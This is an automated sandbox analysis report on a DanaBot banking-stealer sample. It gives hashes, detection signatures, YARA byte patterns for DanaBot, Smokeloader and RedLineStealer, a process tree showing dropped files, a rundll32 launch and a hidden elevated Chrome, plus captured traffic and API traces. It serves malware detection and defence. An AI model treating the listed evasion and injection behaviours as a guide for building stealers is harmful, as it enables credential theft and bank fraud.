Edit tour

Windows Analysis Report
9nSv9py6hs.exe

Overview

General Information

Sample Name:	9nSv9py6hs.exe
Analysis ID:	785816
MD5:	a41ba618482f08fb24090afee9ff771c
SHA1:	215ef2850f7e611d7f66168654e31be123fc36c8
SHA256:	ee2d96412de5f3c0d32099e70007ef01cc02362d9b3df261fb292fb2d3a2f516
Tags:	DanaBotexe
Infos:

Detection

DanaBot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected DanaBot stealer dll

Malicious sample detected (through community Yara rule)

Detected unpacking (overwrites its own PE header)

Detected unpacking (changes PE section rights)

Multi AV Scanner detection for dropped file

Hides threads from debuggers

Machine Learning detection for sample

Machine Learning detection for dropped file

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

AV process strings found (often used to terminate AV products)

Drops PE files

Contains functionality to read the PEB

Dropped file seen in connection with other malware

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

9nSv9py6hs.exe (PID: 5672 cmdline: C:\Users\user\Desktop\9nSv9py6hs.exe MD5: A41BA618482F08FB24090AFEE9FF771C)

9NSV9PY6HS.exe (PID: 4424 cmdline: "C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe" MD5: 358819C5567152065484C562A55074E4)

notepad.exe (PID: 4864 cmdline: C:\Windows\system32\notepad.exe MD5: BB9A06B8F2DD9D24C77F389D7B2B58D2)

chrome.exe (PID: 676 cmdline: chrome.exe" --no-first-run --no-default-browser-check --noerrdialogs --disable-crash-reporter --disable-backgrounding-occluded-windows --disable-background-timer-throttling --disable-extensions-http-throttling --disable-renderer-backgrounding --disable-audio-output --silent-launch --restore-last-session --elevated --profile-directory="Default MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 5188 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --disable-audio-output --noerrdialogs --mojo-platform-channel-handle=1940 --field-trial-handle=1744,i,634409509327282081,5410595586115948395,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

rundll32.exe (PID: 1756 cmdline: "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\Udtshesidi.tmp",Wpfprp MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

GoogleUpdateBroker.exe (PID: 6948 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleUpdateBroker.exe" -Embedding MD5: 4B2EED3642582E2CCF7D9B928C1CC9E1)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.295927024.0000000004B00000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.274015808.0000000004E00000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_DanaBot_stealer_dll_1	Yara detected DanaBot stealer dll	Joe Security
00000000.00000002.274015808.0000000004E00000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000001.00000002.295429309.00000000049C7000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000003.266020343.0000000005070000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DanaBot_stealer_dll_1	Yara detected DanaBot stealer dll	Joe Security
00000000.00000002.271176444.0000000004BC8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.9nSv9py6hs.exe.4e00e67.1.raw.unpack	JoeSecurity_DanaBot_stealer_dll_1	Yara detected DanaBot stealer dll	Joe Security
0.3.9nSv9py6hs.exe.5070000.0.raw.unpack	JoeSecurity_DanaBot_stealer_dll_1	Yara detected DanaBot stealer dll	Joe Security

HTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; AEC=AakniGO7HqlHWlnoY-P22_SwwnNSfVGxlF1NgK5nuj5WLe313NyJi16g7z4; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=nUT82hOv6CVwMNqDg-sTtCMJJ6SQ1v_cCpfCpf5nt8EolEbal01GWFyjG01tqWQgh9ciRU880J6nLd2gdbhAJs44PsHAZaVQAFIbrqe2FmFgjrAAK7W9Z8u5LDvwsuZRng98jP6E23SJ4fsPIs326YmnuCwa92dRRCcB6MNeI_o

Source: unknown

DNS traffic detected: queries for: accounts.google.com

Source: global traffic	HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-104.0.5112.81Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEI0e3KAQiUocsBCPyqzAEIvLzMAQiMvcwBCOfAzAEIm8HMAQiywcwBCMTBzAEI18HMAQjZxMwBCMrGzAEInMnMAQjiy8wBSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; AEC=AakniGO7HqlHWlnoY-P22_SwwnNSfVGxlF1NgK5nuj5WLe313NyJi16g7z4; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=nUT82hOv6CVwMNqDg-sTtCMJJ6SQ1v_cCpfCpf5nt8EolEbal01GWFyjG01tqWQgh9ciRU880J6nLd2gdbhAJs44PsHAZaVQAFIbrqe2FmFgjrAAK7W9Z8u5LDvwsuZRng98jP6E23SJ4fsPIs326YmnuCwa92dRRCcB6MNeI_o
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEI0e3KAQiUocsBCPyqzAEIvLzMAQiMvcwBCOfAzAEIm8HMAQiywcwBCMTBzAEI18HMAQjZxMwBCMrGzAEInMnMAQjiy8wBSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=nUT82hOv6CVwMNqDg-sTtCMJJ6SQ1v_cCpfCpf5nt8EolEbal01GWFyjG01tqWQgh9ciRU880J6nLd2gdbhAJs44PsHAZaVQAFIbrqe2FmFgjrAAK7W9Z8u5LDvwsuZRng98jP6E23SJ4fsPIs326YmnuCwa92dRRCcB6MNeI_o
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=nUT82hOv6CVwMNqDg-sTtCMJJ6SQ1v_cCpfCpf5nt8EolEbal01GWFyjG01tqWQgh9ciRU880J6nLd2gdbhAJs44PsHAZaVQAFIbrqe2FmFgjrAAK7W9Z8u5LDvwsuZRng98jP6E23SJ4fsPIs326YmnuCwa92dRRCcB6MNeI_o
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=nUT82hOv6CVwMNqDg-sTtCMJJ6SQ1v_cCpfCpf5nt8EolEbal01GWFyjG01tqWQgh9ciRU880J6nLd2gdbhAJs44PsHAZaVQAFIbrqe2FmFgjrAAK7W9Z8u5LDvwsuZRng98jP6E23SJ4fsPIs326YmnuCwa92dRRCcB6MNeI_o
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgRUETQFGMTQmp4GIjA_FxiLdIvCSr2pjYo_QcG2-J_xO8wnmrWG8LfU3EK50P7zj9NvetqCss--zsX0VaYyAXI HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=nUT82hOv6CVwMNqDg-sTtCMJJ6SQ1v_cCpfCpf5nt8EolEbal01GWFyjG01tqWQgh9ciRU880J6nLd2gdbhAJs44PsHAZaVQAFIbrqe2FmFgjrAAK7W9Z8u5LDvwsuZRng98jP6E23SJ4fsPIs326YmnuCwa92dRRCcB6MNeI_o
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRUETQFGMTQmp4GIjCnQ9-vGhmjishfoWklr8b83BQV6bmHbjAWW2mvQim2K16slZ0NS8RCmnMwyf1ZJ6EyAXI HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEI0e3KAQiUocsBCPyqzAEIvLzMAQiMvcwBCOfAzAEIm8HMAQiywcwBCMTBzAEI18HMAQjZxMwBCMrGzAEInMnMAQjiy8wBSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=nUT82hOv6CVwMNqDg-sTtCMJJ6SQ1v_cCpfCpf5nt8EolEbal01GWFyjG01tqWQgh9ciRU880J6nLd2gdbhAJs44PsHAZaVQAFIbrqe2FmFgjrAAK7W9Z8u5LDvwsuZRng98jP6E23SJ4fsPIs326YmnuCwa92dRRCcB6MNeI_o
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRUETQFGMTQmp4GIjCdLu5bAsoJ6XyRCD8wbnArDCqIGWGdrGc25s-gDELx4DLmHAmEqEe_nKW8fEAZpeYyAXI HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=nUT82hOv6CVwMNqDg-sTtCMJJ6SQ1v_cCpfCpf5nt8EolEbal01GWFyjG01tqWQgh9ciRU880J6nLd2gdbhAJs44PsHAZaVQAFIbrqe2FmFgjrAAK7W9Z8u5LDvwsuZRng98jP6E23SJ4fsPIs326YmnuCwa92dRRCcB6MNeI_o

Source: 9nSv9py6hs.exe, 00000000.00000002.270866356.000000000312A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Yara detected DanaBot stealer dll

Source: Yara match	File source: 0.2.9nSv9py6hs.exe.4e00e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.9nSv9py6hs.exe.5070000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.274015808.0000000004E00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.266020343.0000000005070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000001.00000002.295927024.0000000004B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.274015808.0000000004E00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000001.00000002.295429309.00000000049C7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.271176444.0000000004BC8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown

Source: 9nSv9py6hs.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000001.00000002.295927024.0000000004B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.274015808.0000000004E00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000001.00000002.295429309.00000000049C7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.271176444.0000000004BC8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12

Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_005FE33C	0_2_005FE33C
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_0062C00C	0_2_0062C00C
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_006280A1	0_2_006280A1
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_00611207	0_2_00611207
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_00626319	0_2_00626319
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_006234F1	0_2_006234F1
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_005D04A0	0_2_005D04A0
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_0063F597	0_2_0063F597
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_006376A9	0_2_006376A9
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_005D7755	0_2_005D7755
Source: C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe	Code function: 1_2_00405232	1_2_00405232
Source: C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe	Code function: 1_2_004028FE	1_2_004028FE

Source: C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe	Code function: 1_2_00408844 NtSetIoCompletion,	1_2_00408844
Source: C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe	Code function: 1_2_00407E62 NtReleaseMutant,	1_2_00407E62
Source: C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe	Code function: 1_2_00406814 NtQueryInformationByName,	1_2_00406814
Source: C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe	Code function: 1_2_0040181F NtProtectVirtualMemory,	1_2_0040181F
Source: C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe	Code function: 1_2_00406630 NtPropagationComplete,	1_2_00406630
Source: C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe	Code function: 1_2_0040143F NtDrawText,	1_2_0040143F
Source: C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe	Code function: 1_2_004086EC NtSetIoCompletion,	1_2_004086EC
Source: C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe	Code function: 1_2_004058F0 NtGetNextThread,	1_2_004058F0
Source: C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe	Code function: 1_2_004024F5 NtRollbackTransaction,	1_2_004024F5
Source: C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe	Code function: 1_2_00407550 NtRollbackTransaction,	1_2_00407550
Source: C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe	Code function: 1_2_00404370 NtDrawText,	1_2_00404370
Source: C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe	Code function: 1_2_00407D74 NtGetWriteWatch,NtMapViewOfSection,NtDrawText,	1_2_00407D74
Source: C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe	Code function: 1_2_00408728 NtSetIoCompletion,	1_2_00408728
Source: C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe	Code function: 1_2_004017C4 NtProtectVirtualMemory,	1_2_004017C4
Source: C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe	Code function: 1_2_004025D4 NtDrawText,	1_2_004025D4
Source: C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe	Code function: 1_2_00408BFE NtSetIoCompletion,	1_2_00408BFE
Source: C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe	Code function: 1_2_00406B88 NtQueryMultipleValueKey,	1_2_00406B88
Source: C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe	Code function: 1_2_004071A4 NtQueryMultipleValueKey,	1_2_004071A4
Source: C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe	Code function: 1_2_004087AC CreateFileW,NtDrawText,	1_2_004087AC
Source: C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe	Code function: 1_2_0040143A NtDrawText,	1_2_0040143A
Source: C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe	Code function: 1_2_004075C6 NtReleaseMutant,	1_2_004075C6
Source: C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe	Code function: 1_2_004085FB NtReleaseMutant,	1_2_004085FB

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe A58AAF48A55926929AD932C9C438851F212C1A6970F3DF39873EE1B6192CBE43
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\Udtshesidi.tmp 1AB1E8894341A241C037FF50C3DEE1AC656F9F82508116DF723A7B8F6188486A

Source: 9nSv9py6hs.exe	ReversingLabs: Detection: 51%
Source: 9nSv9py6hs.exe	Virustotal: Detection: 37%

Source: 9nSv9py6hs.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\9nSv9py6hs.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\9nSv9py6hs.exe C:\Users\user\Desktop\9nSv9py6hs.exe
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Process created: C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe "C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe"
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\Udtshesidi.tmp",Wpfprp
Source: C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe	Process created: C:\Windows\System32\notepad.exe C:\Windows\system32\notepad.exe
Source: C:\Windows\System32\notepad.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe chrome.exe" --no-first-run --no-default-browser-check --noerrdialogs --disable-crash-reporter --disable-backgrounding-occluded-windows --disable-background-timer-throttling --disable-extensions-http-throttling --disable-renderer-backgrounding --disable-audio-output --silent-launch --restore-last-session --elevated --profile-directory="Default
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --disable-audio-output --noerrdialogs --mojo-platform-channel-handle=1940 --field-trial-handle=1744,i,634409509327282081,5410595586115948395,131072 /prefetch:8
Source: unknown	Process created: C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleUpdateBroker.exe "C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleUpdateBroker.exe" -Embedding
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Process created: C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe "C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe"	Jump to behavior
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\Udtshesidi.tmp",Wpfprp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe	Process created: C:\Windows\System32\notepad.exe C:\Windows\system32\notepad.exe	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe chrome.exe" --no-first-run --no-default-browser-check --noerrdialogs --disable-crash-reporter --disable-backgrounding-occluded-windows --disable-background-timer-throttling --disable-extensions-http-throttling --disable-renderer-backgrounding --disable-audio-output --silent-launch --restore-last-session --elevated --profile-directory="Default	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --disable-audio-output --noerrdialogs --mojo-platform-channel-handle=1940 --field-trial-handle=1744,i,634409509327282081,5410595586115948395,131072 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\9nSv9py6hs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\9nSv9py6hs.exe

File created: C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe

Jump to behavior

Source: classification engine

